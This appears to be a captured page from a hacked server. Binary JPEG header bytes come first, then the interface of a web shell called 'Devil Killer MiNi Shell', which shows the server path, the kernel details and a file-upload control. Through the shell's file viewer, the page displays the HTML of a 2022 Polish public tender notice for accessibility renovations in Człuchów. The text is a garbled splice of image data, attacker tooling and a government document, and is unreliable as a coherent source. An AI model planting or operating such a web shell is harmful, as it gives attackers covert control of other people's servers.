JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0004053301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dostosowanie lokalu do potrzeb osób z niepełnosprawnością fizyczną </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191674836</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okopowa 21/27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 58 326 87 35</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 58 326 85 57</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pomorskie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pomorskie.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie lokalu do potrzeb osób z niepełnosprawnością fizyczną </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aa14f242-8024-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00040533</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003589/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Dostosowanie lokalu do potrzeb osób z niepełnosprawnością fizyczną.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie jest realizowane w ramach projektu „Wypracowanie standardu i przeprowadzenie pilotażu w zakresie usług mieszkalnictwa wspomaganego dla osób z niepełnosprawnością fizyczną, z uwzględnieniem możliwości finansowania tego rozwiązania” w ramach Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014-2020, współfinansowanego ze środków Europejskiego Funduszu Społecznego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pomorskie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy<br/>Zakupowej<br/>2. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane winny być za pośrednictwem Platformy zakupowej za<br/>pomocą formularza „Wyślij wiadomość do zamawiającego”.<br/>3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich przesłania za pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego.<br/>4. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. Adres<br/>poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zamowienia@pomorskie.eu<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje elektronicznie za pośrednictwem<br/>Platformy zakupowej. Informacje, zawiadomienia, zmiany, odpowiedzi - Zamawiający będzie<br/>zamieszczał na Platformie zakupowej. Korespondencja, której zgodnie z obowiązującymi przepisami<br/>adresatem jest konkretny Wykonawca, będzie przekazywana elektronicznie za pośrednictwem<br/>Platformy zakupowej do konkretnego Wykonawcy, na adres mailowy wskazany<br/>w ofercie Wykonawcy<br/>6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>przesłanych przez Zamawiającego, bezpośrednio na Platformie zakupowej oraz na poczcie<br/>elektronicznej – adresie wskazanym w ofercie, gdyż system powiadomień może ulec awarii lub<br/>powiadomienie może trafić do folderu SPAM.<br/>7. Zamawiający wskazuje niezbędne wymagania techniczne umożliwiające pracę na Platformie<br/>zakupowej, tj.:<br/>4) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 256 kb/s;<br/>5) przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną<br/>obsługą języka Javascript, akceptująca pliki typu „cookies”.<br/>Ponadto Zamawiający informuję, że występuje limit objętości plików lub spakowanych folderów w<br/>zakresie całej oferty lub wniosku do ilości 10 plików lub spakowanych folderów (pliki można spakować<br/>programem do archiwizacji np. 7-Zip) przy maksymalnej wielkości 150 MB.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na<br/>stronie internetowej Platformy pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący;<br/>2) zapoznał i stosuje się do aktualnej Instrukcji składania ofert/wniosków dostępnej pod adresem:<br/>Instrukcja składania ofert.<br/>9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny<br/>z Instrukcją korzystania z Platformy zakupowej w szczególności za sytuację, gdy Zamawiający<br/>zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty<br/>w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana przez<br/>Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu<br/>ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.<br/>10. W zakresie kwestii nieuregulowanych niniejszą SWZ obowiązują przepisy ustawy Pzp oraz<br/>Rozporządzenia Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz.U. 2020 poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(ogólne rozporządzenie o ochronie danych), dalej „RODO”, informuję,<br/>że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Woj. Pom., z siedzibą ul. Okopowa 21/27, 80-810 Gdańsk. Pozostałe nasze dane kontaktowe to: zamowienia@pomorskie.eu, tel.58 32 68 758;<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD) pod adresem e-mai: iod@pomorskie.eu lub pod nr<br/>tel.58 32 68 518;<br/>Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzieleniu zamówienia, prowadzenia dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>Podstawą przetwarzania danych osobowych jest: ustawa z 11.9.2019 r. – Prawo zamówień publicznych; ustawa z 27.8.2009 r. o finansach publicznych; ustawa z 14.7.1983 r. o narodowym zasobie archiwalnym i archiwach; art. 6 pkt.1 lit. c RODO –przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art.18 oraz art.74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO(szczególna kategoria danych).<br/>Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania oraz przez okres wynikający z przepisów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, w szczególności zgodnie z art.78 ust.1 i 4 uPzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zam., a jeżeli okres obowiązywania umowy w sprawie zam. publ. przekracza 4 lata – przez<br/>cały okres obowiązywania umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zam.;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów,w których zostały zebrane, lub w inny sposób przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zam.<br/>Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-913 Warszawa.<br/>Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postępowaniu o udzielenie zam.; konsekwencje niepodania określonych danych wynikają z PZP.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust.5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAZ-Z.272.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje roboty budowlane - prace adaptacyjno-remontowe oraz<br/>dostawę i montaż wyposażenia, w celu dostosowania lokalu do potrzeb osób<br/>z niepełnosprawnością fizyczną w: Barkowo 44/3, 77-300 Człuchów.<br/>2. Zamówienie jest realizowane w ramach projektu „Wypracowanie standardu<br/>i przeprowadzenie pilotażu w zakresie usług mieszkalnictwa wspomaganego dla osób<br/>z niepełnosprawnością fizyczną, z uwzględnieniem możliwości finansowania tego rozwiązania”<br/>w ramach Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014-2020,<br/>współfinansowanego ze środków Europejskiego Funduszu Społecznego.<br/>3. Zakres prac budowlanych obejmuje m.in. roboty takie jak: przygotowanie terenu budowy,<br/>wykonanie robót dotyczących architektury (w tym pochylni, ścian nośnych i działowych, podłóg i<br/>posadzek, stolarki okiennej i parapetów, sufitów, drzwi wewnętrznych itp.), wykonanie robót<br/>dotyczących konstrukcji, robót dotyczących instalacji sanitarnej, wodno-kanalizacyjne, robót<br/>dotyczących instalacji elektrycznych i teletechnicznych, oświetlenia podstawowego wraz z<br/>obwodami gniazd wtyczkowych ogólnego przeznaczenia, instalacji przyzywowej. Wykonawca<br/>zobowiązany jest do utylizacji odpadów.<br/>4. Szczegółowy zakres prac związany z robotami budowlanymi oraz dostawą i montażem<br/>wyposażenia został określony w następujących dokumentach:<br/>1) Dokumentacji projektowej - załącznik nr 8.1 do SWZ,<br/>2) Przedmiarze robót - załącznik nr 8.2 do SWZ,<br/>3) Specyfikacji Technicznej Wykonania i Odbioru Robót Budowalnych – załącznik nr 8.3 do<br/>SWZ,<br/>4) Raporcie z weryfikacji dokumentacji projektowej dostosowania lokali do potrzeb osób z<br/>niepełnosprawnością fizyczną w pięciu gminach województwa pomorskiego – załącznik nr 8.4<br/>do SWZ,<br/>5) Raporcie z badania wstępnego dostępności dla osób z niepełnosprawnością dotyczącym<br/>dostosowania sześciu lokali do potrzeb osób z niepełnosprawnością fizyczną w pięciu gminach<br/>województwa pomorskiego” - załącznik nr 8.5 do SWZ wraz z załącznikiem „Zestawienie<br/>obmiarów poszczególnych lokali”,<br/>6) Informacji Meritum Projekt Sp. z o.o. w sprawie wymaganych procedur administracyjnych –<br/>załącznik nr 8.6 do SWZ.<br/>5. Zakres nadzoru autorskiego sprawowanego w toku wykonywanych robót budowlanych oraz<br/>montażu wyposażenia określa § 3 wzoru umowy stanowiący załącznik nr 1 do SWZ<br/>6. Po zakończeniu robót budowlanych Wykonawca zobowiązany jest do zawiadomienia<br/>właściwego organu nadzoru budowlanego o zakończeniu budowy i uzyskania pozwolenia na<br/>użytkowanie, jeżeli będzie wymagane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów:<br/>Lp. Kryterium Waga % Oznaczenie<br/>1. Cena brutto wykonania zamówienia 60 PK1<br/>2. Doświadczenie zawodowe osób 20 PK2<br/>3. Okres gwarancji i rękojmi na roboty budowlane i wyposażenie 20 PK3<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej, przy czym<br/>1 %= 1 pkt<br/>Sposób obliczenia całkowitej liczby punktów:<br/>P = PK1+ PK2 + PK3<br/>P – całkowita liczba punktów dla rozpatrywanej oferty<br/>PK1 – liczba punktów uzyskanych w kryterium „Cena brutto wykonania zamówienia”<br/>PK2 – liczba punktów uzyskanych w kryterium „Doświadczenie zawodowe osób”<br/>PK3 – liczba punktów uzyskanych w kryterium „Okres gwarancji i rękojmi”<br/>Szczegółowe informacje dotyczące opisu kryteriów oceny ofert wraz z podaniem wag tych kryteriów i<br/>sposobu oceny ofert znajdują się w Rozdziale XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi na roboty budowlane i wyposażenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie przedmiotowego zamówienia mogą się ubiegać wykonawcy, którzy spełniają<br/>warunki udziału w postępowaniu określone przez zamawiającego.<br/>2. Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie zdolności<br/>technicznej lub zawodowej:<br/>1) Wykonawcy:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada wiedzę<br/>i doświadczenie, co należycie udokumentuje tj. wykaże, że w okresie ostatnich 5 lat licząc<br/>wstecz od dnia, w którym upływa (upłynął) termin składania ofert w niniejszym postępowaniu, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie oraz<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej:<br/>Dwie (2) roboty budowlane, w tym z wykonaniem instalacji elektrycznych i instalacji sanitarnych<br/>na kwotę minimum 150 000,00 zł brutto (każda z robót budowlanych).<br/>Ocena wykazania spełnienia warunku określonego powyżej w ust. 2 pkt 1) nastąpi na podstawie<br/>przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. X ust. 2 pkt 1) lit. a)<br/>SWZ (wzór wykazu należycie wykonanych robót budowlanych stanowi załącznik nr 5 do SWZ).<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>wyżej wymieniony warunek udziału w postępowaniu winien spełniać w całości co najmniej jeden<br/>z wykonawców.<br/>Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega<br/>na zdolnościach technicznych lub zawodowych innego podmiotu, powyższy warunek zostanie<br/>uznany za spełniony jeżeli spełnia go w całości ten podmiot.<br/>UWAGA: W przypadku, gdy rozliczenie za zrealizowane (wykonane) przez Wykonawcę roboty<br/>budowlane nastąpiło w innej niż w PLN walucie, Wykonawca w celu potwierdzenia spełniania<br/>warunku udziału w niniejszym postępowaniu zobowiązany jest do przeliczenia wartości<br/>wykonanych robót budowlanych przyjmując średni kurs złotego w stosunku do walut obcych<br/>określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego opublikowanych<br/>na dzień zamieszczenia Ogłoszenia o zamówieniu oraz Specyfikacji Warunków Zamówienia na<br/>stronie internetowej prowadzonego postępowania.<br/>2) Osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że skieruje do realizacji<br/>zamówienia, 2 osoby posiadające odpowiednie 